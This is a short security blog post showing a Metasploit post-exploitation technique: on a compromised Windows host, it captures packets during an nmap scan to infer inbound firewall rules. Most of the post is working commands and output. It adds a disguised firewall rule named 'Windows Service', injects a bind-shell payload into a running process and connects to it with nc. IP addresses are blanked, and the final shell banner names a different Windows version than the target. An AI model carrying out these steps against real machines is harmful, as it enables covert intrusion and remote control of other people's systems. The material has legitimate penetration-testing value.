Friday, July 19, 2013

Metasploit: Getting Ingress firewall rules

This week Rapid7 announced the addition of Metamodules in Metasploit Pro v4.7. One of these modules, "Egress Firewall Testing", allows you to deduce outbound filtering rules from firewalls/routers. No doubt this functionality is really useful for example if we want to leave a reverse shell pointing to our machine. To get this, the metamodule "contacts to Rapid7-hosted server to test open ports and delivers the results in one easy report"

This module reminds me a little trick I usually do to get just the opposite, that is, to infer ingress firewall rules. In fact, this post could be the second part of the recent "Donde dejo mi bind shell" (spanish) but this time, with the advantage of Metasploit.

As I said in that post, by knowing what ports are reachabled from the victim host we can infer inbound filtering rules like Static Inside NAT/PAT, ACLs, etc. implemented in firewalls/routers; information really valuable if you plan to spawn a bind shell. Let'see this case.

We got a Meterpreter shell and we want to run a bind shell. If we launch nmap from outside we see that all ports are filtered or closed (except the ones opened). So, where do we leave the shell? are those ports filtered by the external firewall or maybe by a local FW software? At first I thought of making a post-exploitation module to play with the windows firewall logging (netsh advfirewall>set allprofiles logging droppedconnections enable) but later I realized that it would be better and easier if I use packetrecorder. So to know what packets are exposed to outside, we run:

meterpreter > run packetrecorder -i 2 -t 60
[*] Starting Packet capture on interface 2
[+] Packet capture started
[*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/USER-PC_20130720.1626/USER-PC_20130720.1626.cap
[*] Packet capture interval is 60 Seconds

and launch the scan again:

root@gotham:~# nmap -sS -p 21,23,100-200,3389,8080 -PN

Starting Nmap 6.00 ( ) at 2013-07-20 16:02 CEST
Nmap scan report for
Host is up (0.00055s latency).
All 105 scanned ports on are filtered
MAC Address: 08:00:27:6D:E7:88 (Cadmus Computer Systems)

With the .cap file, let's show now the reachabled ports:

root@gotham:~/.msf4/logs/scripts/packetrecorder/USER-PC_20130720.1626# tshark -r USER-PC_20130720.1626.cap -R "ip.src ==" -T fields -e tcp.dstport | sort -u


Nice, we know now that the filter to those ports comes from the Windows Firewall, and not from the external router/firewall. We just need to allow one of these ports and run the bind shell:

meterpreter > shell
Process 2888 created.
Channel 1 created.
Microsoft Windows [Versi�n 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Users\User\Desktop>netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow protocol=TCP localport=8080
netsh advfirewall firewall add rule name="Windows Service" dir=in action=allow protocol=TCP localport=8080


meterpreter > run post/windows/manage/payload_inject PAYLOAD=windows/shell_bind_tcp LPORT=8080 LHOST=

[*] Running module against USER-PC
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Command Shell, Bind TCP Inline into process ID 3456
[*] Opening process 3456
[*] Generating payload
[*] Allocating memory in procees 3456
[*] Allocated memory at address 0x003d0000, for 341 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 3456

meterpreter > netstat -h

Connection list

    Proto  Local address       Remote address     State        User  Inode  PID/Program name
    -----  -------------       --------------     -----        ----  -----  ----------------
    tcp*          LISTEN       0     0      700/svchost.exe
    tcp*          LISTEN       0     0      4/System

    tcp*          LISTEN       0     0      3456/notepad.exe

meterpreter > exit -y

[*] Shutting down Meterpreter...

[*] - Meterpreter session 1 closed.  Reason: User exit

msf post(payload_inject) > exit

root@gotham:~#  nc 8080
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usuario\Escritorio>

No comments:

Post a Comment